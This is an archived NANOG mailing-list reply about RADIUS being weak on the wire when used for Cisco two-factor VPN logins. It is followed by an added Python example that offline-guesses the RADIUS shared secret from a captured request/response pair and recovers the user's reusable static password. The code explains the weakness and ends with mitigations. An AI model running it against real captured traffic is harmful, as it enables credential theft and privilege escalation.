nanog mailing list archives
Re: Cisco 2 factor authentication
From: Jimmy Hess <mysidia () gmail com>
Date: Sat, 25 Jun 2016 21:46:22 -0500
On Wed, Jun 22, 2016 at 9:38 PM, Chris Lawrence <clawrence () dovefire co uk> wrote:
> Any RADIUS-based auth works well. I've used a solution by SecurEnvoy in the past which seems to work well; they also have soft token apps, hard tokens plus SMS based.
However, a cautionary note there is that the RADIUS protocol itself uses only weak cryptography and is not secure on the wire. That is, in the absence of the proprietary AES Keywrap extension, or when the credential method is not authentication using a client-side certificate (PKI) as in *EAP.

Specifically: if RADIUS is used for the Authentication stage of AAA with a code sent by SMS or OATH token [user types normal password + one-time password], then when traffic between the RADIUS server and the VPN device is captured, the user credentials may be exposed with the extremely weak crypto protection RADIUS or NTLM provides for the user password.

If a user re-uses the same password somewhere else on a device not requiring 2FA, then capturing RADIUS traffic could be an effective privilege escalation by copying the victim's password from a sniffed RADIUS exchange.

--
-JH
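The on-wire weakness described in the post above, as an added worked example (not code from the post, from NANOG, or from any vendor): it implements the RFC 2865 User-Password hiding (MD5 of shared secret plus Request Authenticator, XORed over the padded password) and the Response Authenticator, builds a captured Access-Request/Access-Accept pair, and shows what a passive observer recovers once the shared secret is known or guessed offline from a candidate list. The shared secret, username, "static password + 6-digit OTP" string and the candidate secrets are constructed sample values, not anything from the page.

```python
import hashlib
import os
import struct

USER_NAME, USER_PASSWORD = 1, 2          # RFC 2865 attribute types
ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2     # RFC 2865 packet codes


def _md5(*parts: bytes) -> bytes:
    return hashlib.md5(b"".join(parts)).digest()


def hide_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 s5.2: pad to a 16-byte multiple, XOR each block with
    MD5(secret + previous block); the first block uses the Request Authenticator,
    which travels in the clear in the packet. The shared secret is the only key."""
    padded = password + b"\x00" * (-len(password) % 16) or b"\x00" * 16
    out, prev = bytearray(), request_auth
    for i in range(0, len(padded), 16):
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], _md5(secret, prev)))
        out += block
        prev = block
    return bytes(out)


def unhide_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_password: anyone holding the secret and the captured packet can run it."""
    out, prev = bytearray(), request_auth
    for i in range(0, len(hidden), 16):
        block = hidden[i:i + 16]
        out += bytes(c ^ k for c, k in zip(block, _md5(secret, prev)))
        prev = block
    return bytes(out).rstrip(b"\x00")


def encode_attrs(attrs) -> bytes:
    # Each attribute is Type(1) Length(1, includes these two bytes) Value.
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)


def parse_attrs(packet: bytes) -> dict:
    """Return {type: value} for the attributes after the 20-byte RADIUS header."""
    attrs, i = {}, 20
    while i + 2 <= len(packet):
        t, length = packet[i], packet[i + 1]
        if length < 2 or i + length > len(packet):
            raise ValueError("malformed attribute length")
        attrs[t] = packet[i + 2:i + length]
        i += length
    return attrs


def build_packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def build_access_request(username: bytes, password: bytes, secret: bytes,
                         ident: int = 1, request_auth: bytes = None) -> bytes:
    """What the VPN device (NAS) sends to the RADIUS server for a password login."""
    request_auth = request_auth or os.urandom(16)
    attrs = encode_attrs([(USER_NAME, username),
                          (USER_PASSWORD, hide_password(password, secret, request_auth))])
    return build_packet(ACCESS_REQUEST, ident, request_auth, attrs)


def build_access_accept(request: bytes, secret: bytes, attrs: bytes = b"") -> bytes:
    """Response Authenticator (RFC 2865 s3): MD5(Code+ID+Length+RequestAuth+Attrs+Secret).
    It is an unsalted MD5 over public data plus the secret, so it is an offline-guessable oracle."""
    ident, request_auth = request[1], request[4:20]
    header = struct.pack("!BBH", ACCESS_ACCEPT, ident, 20 + len(attrs))
    return build_packet(ACCESS_ACCEPT, ident, _md5(header, request_auth, attrs, secret), attrs)


def guess_secret(request: bytes, response: bytes, candidates):
    """Offline test of candidate shared secrets against one captured request/response pair."""
    ident, request_auth = request[1], request[4:20]
    header = struct.pack("!BBH", response[0], ident, struct.unpack("!H", response[2:4])[0])
    for s in candidates:
        if _md5(header, request_auth, response[20:], s) == response[4:20]:
            return s
    return None


def recover_credentials(request: bytes, secret: bytes):
    """What a passive observer with the secret reads out of one captured Access-Request."""
    attrs = parse_attrs(request)
    return attrs[USER_NAME], unhide_password(attrs[USER_PASSWORD], secret, request[4:20])


if __name__ == "__main__":
    # Constructed sample: static password followed by a 6-digit OTP, as in the post.
    secret = b"testing123"
    req = build_access_request(b"alice", b"Winter2016!" + b"482913", secret)
    acc = build_access_accept(req, secret)
    found = guess_secret(req, acc, [b"radius", b"secret", b"testing123", b"cisco"])
    user, pw = recover_credentials(req, found)
    # The OTP suffix is spent, but the static prefix is exactly what gets reused elsewhere.
    print(user.decode(), "static:", pw[:-6].decode(), "otp:", pw[-6:].decode())
```

The OTP only protects the RADIUS-fronted service: the observer still walks away with the reusable static password, which is the privilege-escalation path the post warns about. Mitigations implied by the post (EAP with client certificates, or a vendor keywrap extension) change what crosses the wire; a long random shared secret only makes guess_secret impractical, it does not change the construction.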
Current thread:
- Cisco 2 factor authentication Ray Ludendorff (Jun 22)
- Re: Cisco 2 factor authentication Chris Lawrence (Jun 23)
- Re: Cisco 2 factor authentication Jimmy Hess (Jun 25)
- Re: Cisco 2 factor authentication Alan Buxey (Jun 26)
- Re: Cisco 2 factor authentication Tom Smyth (Jun 26)
- Re: Cisco 2 factor authentication Jimmy Hess (Jun 25)
- Re: Cisco 2 factor authentication Ryan Gelobter (Jun 27)
- <Possible follow-ups>
- Re: Cisco 2 factor authentication Peter Loron (Jun 23)
- Re: Cisco 2 factor authentication Chris Lawrence (Jun 23)